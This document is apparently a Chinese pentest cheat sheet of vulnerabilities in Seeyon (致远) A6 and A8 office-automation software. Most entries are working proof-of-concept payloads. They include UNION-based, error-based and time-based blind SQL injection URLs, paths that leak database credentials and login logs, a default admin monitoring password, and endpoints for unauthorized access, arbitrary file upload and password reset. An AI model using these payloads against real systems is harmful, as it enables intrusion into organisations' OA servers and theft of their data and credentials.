A6 - SQL注入 - search_result.jsp Date 2013 复现 POC | EXP /oaSearch/search_result.jsp
A6 - SQL注入 - setextno.jsp Date 2014 类型 SQL注入 影响范围 复现 POC | EXP/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20UnIoN%20SeLeCt%201,2,md5(1234),1%23
A6 - SQL注入 - test.jsp Date2015 类型 SQL注入 影响范围 复现 POC | EXP /common/js/menu/test.jsp?doType=101&S1=SeLeCt%20Md5(1234)
A6 - SQL注入 - iSignatureHtmlServer.jsp Date 2015 类型 SQL注入 影响范围 类型 SQL注入 复现 POC | EXP/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27AnD%20(SeLeCt%201%20FrOm%20(SeLeCt%20CoUnT(*),CoNcaT(Md5(1234),FlOoR(RaNd(0)*2))x%20FrOm%20InFoRmAtIoN_ScHeMa.TaBlEs%20GrOuP%20By%20x)a)%23
A6 - SQL注入 - messageViewer.jsp Date 2015 类型 影响范围 复现 POC | EXP /ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1'UnIoN%20AlL%20SeLeCt%20NULL,Md5(1234),NULL,NULL%23
A6 - SQL注入 - resend.jsp Date 2015 类型 影响范围 复现 POC | EXP/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20AnD%201=2%20UnIon%20SeLeCt%20Md5(1234)%20--
A6 - 敏感信息泄露 Date2015 类型 影响范围 复现POC | EXP/common/selectPersonNew/initData.jsp?trueName=1/assess/js/initDataAssess.jsp/common/SelectPerson/reloadData.jsp/ext/trafaxserver/SystemManage/config/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
A6 - SQL注入 - initData.jsp Date 2015 类型 SQL注入 影响范围 复现 POC | EXP /common/selectPersonNew/initData.jsp?trueName=1%25%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28sleep%286%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C1%29%29>64%20AND%20%27%25%27%3D%27
A6 - 敏感信息泄露 - 数据库账号密码 Date 2015 类型 信息泄露 影响范围 复现 POC | EXP /createMysql.jsp/ext/createMysql.jsp
A8-V5 - 信息泄露 - log泄露 Date 2014 类型 信息泄露 复现 POC | EXP /logs/login.log/seeyon/logs/login.log/seeyon/logs/ctp.log/seeyon/logs/uc.log
A8 - 监控后台默认密码漏洞 Date 2015 类型 弱口令 复现 POC | EXP /seeyon/management/status.jsp /seeyon/management/index.jsp /management/index.jsp password:WLCCYBD@SEEYON
A8 - CmxUserSQL时间盲注 Date 2015 类型 注入 复现/Server/CmxUser.php
致远A8-V5 - 未授权访问 /seeyon/ctp/sysmgr/monitor/cacheDump.do
致远A8-V5 - 越权 - 普通用户任意文件上传 致远A8-V5 - 通用口令漏洞 致远A6 - SessionID泄露漏洞 致远A6 - DBA权限SQL注入 - /seeyon/checkWaitdo.jsp 致远A6 - SQL注入 - /docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 致远A6 - 信息泄露 - 数据库信息 - /ext/byoa/start.jsp 致远A6 - SQL注入 - /ext/trafaxserver/ExtnoManage/isNotInTable.jsp 致远OA 3.5 - 文件上传 - /seeyon/fileUPload.do 致远A6 - SQL注入 - /ext/trafaxserver/downloadAtt.jsp?attach_ids=[sqli] 致远A8-V5 - 任意用户密码修改漏洞 - /services/authorityService?wsdl 致远 - 敏感信息泄露 - /admin/login/user.properties 致远 - SQL注入 - /common/js/menu/test.jsp